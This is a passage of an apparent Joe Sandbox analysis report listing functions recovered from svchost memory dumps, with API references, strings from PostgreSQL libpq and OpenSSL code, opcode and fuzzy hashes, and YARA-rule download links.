                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$putc$__acrt_iob_func$fflushfreemalloc
                                                                                            • String ID: Query returned %d row%s.$out of memory
                                                                                            • API String ID: 3348181054-1070403740
                                                                                            • Opcode ID: daf36eade4ae832f9c3c1a95f1a9f5aa35b79da6bf250f0a2a24c6a83ae5a133
                                                                                            • Instruction ID: b7dba5235b247331061cd23039f345db9d6337d1676b2fb87ac8ec6a81e598fb
                                                                                            • Opcode Fuzzy Hash: daf36eade4ae832f9c3c1a95f1a9f5aa35b79da6bf250f0a2a24c6a83ae5a133
                                                                                            • Instruction Fuzzy Hash: 1E91F621B0B64646FA119F22A56037A67A3FF45BD0F5C6234DE5E63797CE3EE0098708
                                                                                            Function 00007FFDA36E2FD0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 152networkCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_strduplibintl_dgettextmemcpyselect
                                                                                            • String ID: %s() failed: %s$connection not open$invalid socket$libpq-16$select$show password_encryption$timeout expired
                                                                                            • API String ID: 162101712-2926306909
                                                                                            • Opcode ID: f93bd4caa0f8005bf9aa3bf496aafc810bb72b93c10e86d23885dcdda54c6d00
                                                                                            • Instruction ID: c3b615e10edf17d4e7dbb75ada5a27b7c6f0dfc270e33408942b620d37af60f7
                                                                                            • Opcode Fuzzy Hash: f93bd4caa0f8005bf9aa3bf496aafc810bb72b93c10e86d23885dcdda54c6d00
                                                                                            • Instruction Fuzzy Hash: CF61B531B1EA8285FA209F2494242F92752AF457A4F3C2335ED6D663D7DF7EE0498708
                                                                                            Function 00007FFDA36D7D00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 121stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA62B
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA750
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA762
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D6A
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D8E
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D9C
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7DDB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7E77
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7E84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv$_strdup$freestrcmp
                                                                                            • String ID: PGREQUIRESSL$out of memory$require$sslmode$sslrootcert$system$user$verify-full
                                                                                            • API String ID: 1047289061-184802954
                                                                                            • Opcode ID: b7d1f05e20b50ada9acf8ed70c6fee453e34d7e5be8980550c3b692e8bcbb280
                                                                                            • Instruction ID: 154437e31937cc3127e8579f161dd12f29709c6a53e0b4efe7e339cb4fe45fd2
                                                                                            • Opcode Fuzzy Hash: b7d1f05e20b50ada9acf8ed70c6fee453e34d7e5be8980550c3b692e8bcbb280
                                                                                            • Instruction Fuzzy Hash: 5B515C22B0BE4280FE659F11E5702B867A2AF55BC4F4C6435CD4E23796DE3EE8458349
                                                                                            Function 00007FFDA36D2B50 Relevance: 24.2, APIs: 6, Strings: 10, Instructions: 187stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D2BF4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2C78
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2E2A
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2E5D
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D2CCD
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errnostrcmp$libintl_dgettextmalloc
                                                                                            • String ID: SCRAM-SHA-256$SCRAM-SHA-256-PLUS$channel binding is required, but server did not offer an authentication method that supports channel binding$channel binding required, but SSL not in use$duplicate SASL authentication request$fe_sendauth: invalid authentication request from server: invalid list of authentication mechanisms$fe_sendauth: no password supplied$none of the server's SASL authentication mechanisms are supported$out of memory$server offered SCRAM-SHA-256-PLUS authentication over a non-SSL connection
                                                                                            • API String ID: 349886974-2161727195
                                                                                            • Opcode ID: f04bf8b85d22d0ade34d147d98e5d56217356f588ba04273c084cd825d37f8ae
                                                                                            • Instruction ID: 3b16674bf9b47131db8cc3dd194d61770b8eeb917463d0656d54025f76e6cb22
                                                                                            • Opcode Fuzzy Hash: f04bf8b85d22d0ade34d147d98e5d56217356f588ba04273c084cd825d37f8ae
                                                                                            • Instruction Fuzzy Hash: B9816322B0EA4241FB919B15F4603B92363AF85BC4F5C6032DA4D66797DF6FE945C308
                                                                                            Function 660127C0 Relevance: 24.1, APIs: 16, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 20842923dec6a37a38fbe7a44a2cfd6c13396a78ef2881cbdfb0ba667dcd84c0
                                                                                            • Instruction ID: 790235bbed15f1cbc3634ca775d828f42472d399f3e7b01ee864f7345b86de1b
                                                                                            • Opcode Fuzzy Hash: 20842923dec6a37a38fbe7a44a2cfd6c13396a78ef2881cbdfb0ba667dcd84c0
                                                                                            • Instruction Fuzzy Hash: D721C022A6E1558BD211DBF85C9039EFE80DF8332DB806B33E91D47780DBB8CD868611
                                                                                            Function 00007FFDA36D4F00 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfree$strncmp$ErrorLastStartupmallocstrchr
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 1775759426-2599737071
                                                                                            • Opcode ID: e7f72bd8354b383e440049ac08ae617397bfb18538584d10b4ae5da456b70258
                                                                                            • Instruction ID: 147dacbe091217827db96ab6890649fc90c87a50e52809b517cddbf6ea24d7fe
                                                                                            • Opcode Fuzzy Hash: e7f72bd8354b383e440049ac08ae617397bfb18538584d10b4ae5da456b70258
                                                                                            • Instruction Fuzzy Hash: 2B512D22B0BF4246FB559B15A5603796392AF45BC4F0C6070DE4D2AB9BDF3EE845C348
                                                                                            Function 00007FFDA3682360 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3601C50: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFDA3601C95
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368238B
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA36823A3
                                                                                              • Part of subcall function 00007FFDA3677C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFDA3662254), ref: 00007FFDA3677C3F
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA36823F4
                                                                                            • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682405
                                                                                            • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368241B
                                                                                            • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682449
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682457
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368246C
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682484
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_numR_newR_set_debugX509_i2d_$L_sk_valueO_zallocR_vset_error
                                                                                            • String ID: construct_ca_names$ssl\statem\statem_lib.c
                                                                                            • API String ID: 3967720115-3433467796
                                                                                            • Opcode ID: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                            • Instruction ID: d091b442471d20a7f51407d6ecc8c8b2f54a0115de536dc2baf6206e83476340
                                                                                            • Opcode Fuzzy Hash: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                            • Instruction Fuzzy Hash: BA41C521F0E24243F610E762E8715B95652AF997D0F4C2831DE4DA7B97EF7EE4818328
                                                                                            Function 00007FFDA36E11F0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F4530: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000430,00000000,?,00000000,00000000,00000000,?,00000000,00007FFDA36F47BC,?,?,00000000), ref: 00007FFDA36F457B
                                                                                              • Part of subcall function 00007FFDA36F4530: CreateFileA.KERNEL32 ref: 00007FFDA36F4621
                                                                                              • Part of subcall function 00007FFDA36F4530: GetLastError.KERNEL32 ref: 00007FFDA36F4630
                                                                                              • Part of subcall function 00007FFDA36F4530: RtlGetLastNtStatus.NTDLL ref: 00007FFDA36F465B
                                                                                            • _read.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E16D5
                                                                                            • _read.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E17AB
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E17C6
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E17DC
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E150F
                                                                                              • Part of subcall function 00007FFDA36F3E00: LoadLibraryExA.KERNEL32 ref: 00007FFDA36F3E47
                                                                                              • Part of subcall function 00007FFDA36F3E00: GetLastError.KERNEL32 ref: 00007FFDA36F3E5C
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E15D4
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E1823
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$Last_close$Error_read$CreateFileLibraryLoadStatus_wassertlibintl_dgettext
                                                                                            • String ID: argument of lo_write exceeds integer range$cannot determine OID of function %s$could not open file "%s": %s$could not read from file "%s": %s$lo_create
                                                                                            • API String ID: 1934334265-1567912773
                                                                                            • Opcode ID: 31785a9ec2ae0dbab07ace374526063e477f3dd8df08ff5f7233dc485cf677b8
                                                                                            • Instruction ID: 983fbb81375845c2952598041923d07fa0c8c10f058462d4137782ee44b9f99b
                                                                                            • Opcode Fuzzy Hash: 31785a9ec2ae0dbab07ace374526063e477f3dd8df08ff5f7233dc485cf677b8
                                                                                            • Instruction Fuzzy Hash: 0391B471B0A64286F7149F11E4643BA63A2FB44784F682135EB4D67787DF3EE448DB04
                                                                                            Function 00007FFDA36D2080 Relevance: 21.2, APIs: 3, Strings: 11, Instructions: 173stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D21F0
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD601
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD621
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD64A
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD660
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD689
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D227D
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D22D3
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errno$libintl_dgettextmallocstrcmp
                                                                                            • String ID: could not encrypt password: %s$md5$n$o$off$out of memory$password_encryption value too long$scram-sha-256$show password_encryption$unexpected shape of result set returned for SHOW$unrecognized password encryption algorithm "%s"
                                                                                            • API String ID: 2669966460-1542938121
                                                                                            • Opcode ID: 685abae318517cc38282907127db721522e3de23cf5f7e373fbeafdd212f7d86
                                                                                            • Instruction ID: 933a1f37569deac1f0ef9ce73e15ad8c39db7b995baffc49c6f13250cb5f4578
                                                                                            • Opcode Fuzzy Hash: 685abae318517cc38282907127db721522e3de23cf5f7e373fbeafdd212f7d86
                                                                                            • Instruction Fuzzy Hash: 7961B452B1FF8645FE94AB25A8303B96792AF45BC4F4C7031DA4E667C7DE2EE0458308
                                                                                            Function 66013FC0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: ~
                                                                                            • API String ID: 4206212132-1707062198
                                                                                            • Opcode ID: 21f2b6e04ff2266948ea64f7cb8e1876e9d0e051aa6a3bbe4280e8069c0cad89
                                                                                            • Instruction ID: 3555c39b979745ede8dc66afa62e793a1e2333b2dd720fc6b1321b8c210b37bb
                                                                                            • Opcode Fuzzy Hash: 21f2b6e04ff2266948ea64f7cb8e1876e9d0e051aa6a3bbe4280e8069c0cad89
                                                                                            • Instruction Fuzzy Hash: CD414A22B1C1C08AD32287F9985074EFE91936779CF444773EDA84B3D5C5ADC945D352
                                                                                            Function 00007FFDA36D4BB2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 134networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLast$free
                                                                                            • String ID: could not get peer credentials: %s$could not send SSL negotiation packet: %s$could not send startup packet: %s$out of memory$requirepeer parameter is not supported on this platform
                                                                                            • API String ID: 639846730-1707911190
                                                                                            • Opcode ID: d041343bb5531454f65594fc02db2f4c14d9a5ac42e32eb2781c947c34864a32
                                                                                            • Instruction ID: 1f72f7dbdc8b915d2aaa5a7f474fec5f728328b0851fcf683e42847daf1a2970
                                                                                            • Opcode Fuzzy Hash: d041343bb5531454f65594fc02db2f4c14d9a5ac42e32eb2781c947c34864a32
                                                                                            • Instruction Fuzzy Hash: 22519062B0AA8281FB569B21D4252F82363AF457C4F4C6031CE0D2779BDE7EE945C318
                                                                                            Function 00007FFDA36F4980 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F49DA
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36F49FD
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36F4A31
                                                                                            • libintl_gettext.LIBINTL-9(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4AE4
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4AF1
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36F4B0D
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36F4B1B
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4B24
                                                                                              • Part of subcall function 00007FFDA36F39E0: isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A33
                                                                                              • Part of subcall function 00007FFDA36F39E0: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A3F
                                                                                              • Part of subcall function 00007FFDA36F39E0: isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A5B
                                                                                              • Part of subcall function 00007FFDA36F39E0: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A67
                                                                                              • Part of subcall function 00007FFDA36F5F50: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F5F72
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4B4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
